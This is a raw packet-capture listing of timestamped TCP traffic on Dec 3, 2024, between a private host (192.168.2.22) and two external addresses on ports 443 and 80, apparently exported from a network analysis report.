                                                                                                                                                                                  Dec 3, 2024 14:01:37.917787075 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:37.917817116 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:37.917958021 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:37.917984962 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:37.917998075 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.047739983 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.047776937 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.047868013 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.047902107 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.047919989 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.047919989 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.054949045 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.054960012 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.054986000 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.055006027 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.055013895 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.055027962 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.055046082 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.055056095 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.055064917 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.055084944 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.055104971 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.062105894 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.062115908 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.062139034 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.062165022 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.062181950 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.062196016 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.062207937 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.062207937 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.062236071 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.069092989 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.069125891 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.069163084 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.069181919 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.069209099 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.075656891 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.075711012 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.075747967 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.075769901 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.075783968 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.075783968 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.082575083 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.082603931 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.082664967 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.082679033 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.082709074 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.091248035 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.091278076 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.091309071 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.091331959 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.091346979 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.119443893 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.119474888 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.119498968 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.119519949 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.119529963 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.119538069 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.248852015 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.248883963 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.248912096 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.248934984 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.248948097 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.248994112 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.255976915 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.255986929 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.256010056 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.256025076 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.256030083 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.256046057 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.256053925 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.256067038 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.256074905 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.263264894 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.263294935 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.263319969 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.263333082 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.263341904 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.263358116 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.263358116 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.263365984 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.269646883 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.269670963 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.269695997 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.269711971 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.269737005 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.269737005 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.277384996 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.277430058 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.277431011 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.277451992 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.277477980 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.283771992 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.283793926 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.283842087 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.283842087 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.283860922 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.283876896 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.290919065 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.290947914 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.290990114 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.291004896 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.291018009 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.291124105 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.323653936 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.323683977 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.323755026 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.323787928 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.323803902 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.450867891 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.450905085 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.450989008 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.451013088 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.451153040 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.451153040 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.457114935 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.457124949 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.457143068 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.457174063 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.457225084 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.457225084 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.457242012 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.457253933 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.464531898 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.464565039 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.464572906 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.464593887 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.464720011 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.464729071 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.464773893 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.471580982 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.471621037 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.471640110 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.471657038 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.471669912 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.471684933 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.471693039 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.471712112 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.478369951 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.478400946 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.478425026 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.478432894 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.478445053 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.478475094 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.485678911 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.485709906 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.485747099 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.485757113 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.485765934 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.485775948 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.492073059 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.492100000 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.492132902 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.492141008 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.492151976 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.492260933 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.522100925 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.522125006 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.522198915 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.522207975 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.522245884 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.545701981 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:38.652167082 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.652210951 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.652342081 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.652342081 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.652342081 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.652358055 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.659133911 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.659147978 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.659176111 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.659185886 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.659194946 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.659209013 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.659214020 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.659229040 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.659251928 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.667603970 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.667615891 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.667638063 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.667659044 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.667669058 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.667680025 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.667689085 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.667721987 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.667773962 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:38.667897940 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:38.673161030 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.673198938 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.673213005 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.673223972 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.673233986 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.673274040 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.675544977 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.675592899 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.675601006 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.675621986 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:38.675656080 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.676246881 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:38.789268017 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948823929 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948841095 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948860884 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948872089 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948882103 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948885918 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948894024 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948906898 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948906898 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948919058 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948929071 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948930025 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948961020 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:39.949811935 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:39.949851036 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.130892038 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.130908012 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.131180048 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.133573055 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.134047031 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.134103060 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.138442039 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.138905048 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.138962984 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.145620108 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.145642042 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.145703077 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.152753115 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.152769089 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.152832031 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.157792091 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.157807112 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.157870054 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.162501097 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.162514925 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.162564039 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.170135975 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.170150995 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.170193911 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.177776098 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.177789927 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.177828074 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.182559967 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.182573080 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.182632923 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.264885902 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.264909029 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.265101910 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.270248890 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.270262003 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.270306110 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.281965017 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.281976938 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.282018900 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.291235924 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.295367956 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.295380116 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.295517921 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.301769972 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.301781893 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.301830053 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.308583021 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.310746908 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.310795069 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.310856104 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.315829039 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.315840006 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.315901995 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.318974018 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.319811106 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.319860935 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.324296951 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.324310064 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.324358940 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.329401016 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.329554081 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.329602003 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.337968111 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.338020086 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.338067055 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.346489906 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.346503019 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.346548080 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.355103016 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.355117083 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.355165958 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.363559008 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.363571882 CET8049177142.93.65.161192.168.2.22
